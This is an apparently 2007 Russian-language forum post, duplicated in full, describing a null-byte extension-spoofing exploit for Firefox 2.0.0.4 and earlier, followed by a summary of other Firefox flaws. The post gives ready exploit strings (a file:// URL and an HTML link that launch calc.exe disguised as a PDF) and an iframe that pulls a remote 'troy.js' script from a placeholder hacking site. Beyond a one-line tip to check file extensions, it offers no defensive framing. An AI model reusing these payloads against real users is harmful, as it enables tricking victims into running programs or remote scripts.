-=lebed=-
24.07.2007, 10:30
Mozilla Firefox URLBar: выполнение произвольного кода.
автор: 0х00000000
www.0x000000.com/?i=333
Цель: Mozilla Firefox практически всех версий. <=2.0.0.4
Опасность: 4/10
Exploit:
В строке URL пишем:
file:///C:/winnt/system32/calc.exe%00.pdf
или в теле html-документа используем ссылку вида:
<A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A>
Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки).
Подробности:
При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ.
http://lebed.ucoz.ru/images/bug_ff.png
Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe.
Тут открываются возможности по выполнению произвольного javascript-сценария: например так:
file:///path/troy.txt%00.html
а файл troy.txt%00.html может содержать например такой html-код:
<html>
<iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>
Защита: Внимательно смотрите на раширения файлов перед открытием.
ЗЫ: Другие уязвимости FF:
Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, выполнить произвольный код, осуществить XSS атаку, произвести DoS атаку и атаку спуфинга.
1) Уязвимость возникает из-за множественных ошибок в движке браузера. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
2) Уязвимость возникает из-за множественных ошибок в движке Javascript. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки в методах "addEventListener" и "setTimeout". Эксплуатирование уязвимости приведет к обходу политик безопасности браузера и выполнению сценария в контексте другого сайта.
4) Уязвимость возникает из-за ошибки междоменной (cross-domain) обработки. Эксплуатирование уязвимости приведет к вставке произвольного сценария в sub-frame другого Web сайта.
5) Уязвимость возникает из-за ошибки в обработке элементов внешних документов. Атакующий может вызвать обработчик событий и выполнить произвольный код с привилегиями chrome.
6) Уязвимость возникает из-за ошибки в обработке "XPCNativeWrapper" Атакующий может выполнить произвольный код
за подробностями на bugtrack.ru
автор: 0х00000000
www.0x000000.com/?i=333
Цель: Mozilla Firefox практически всех версий. <=2.0.0.4
Опасность: 4/10
Exploit:
В строке URL пишем:
file:///C:/winnt/system32/calc.exe%00.pdf
или в теле html-документа используем ссылку вида:
<A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A>
Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки).
Подробности:
При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ.
http://lebed.ucoz.ru/images/bug_ff.png
Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe.
Тут открываются возможности по выполнению произвольного javascript-сценария: например так:
file:///path/troy.txt%00.html
а файл troy.txt%00.html может содержать например такой html-код:
<html>
<iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>
Защита: Внимательно смотрите на раширения файлов перед открытием.
ЗЫ: Другие уязвимости FF:
Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, выполнить произвольный код, осуществить XSS атаку, произвести DoS атаку и атаку спуфинга.
1) Уязвимость возникает из-за множественных ошибок в движке браузера. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
2) Уязвимость возникает из-за множественных ошибок в движке Javascript. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки в методах "addEventListener" и "setTimeout". Эксплуатирование уязвимости приведет к обходу политик безопасности браузера и выполнению сценария в контексте другого сайта.
4) Уязвимость возникает из-за ошибки междоменной (cross-domain) обработки. Эксплуатирование уязвимости приведет к вставке произвольного сценария в sub-frame другого Web сайта.
5) Уязвимость возникает из-за ошибки в обработке элементов внешних документов. Атакующий может вызвать обработчик событий и выполнить произвольный код с привилегиями chrome.
6) Уязвимость возникает из-за ошибки в обработке "XPCNativeWrapper" Атакующий может выполнить произвольный код
за подробностями на bugtrack.ru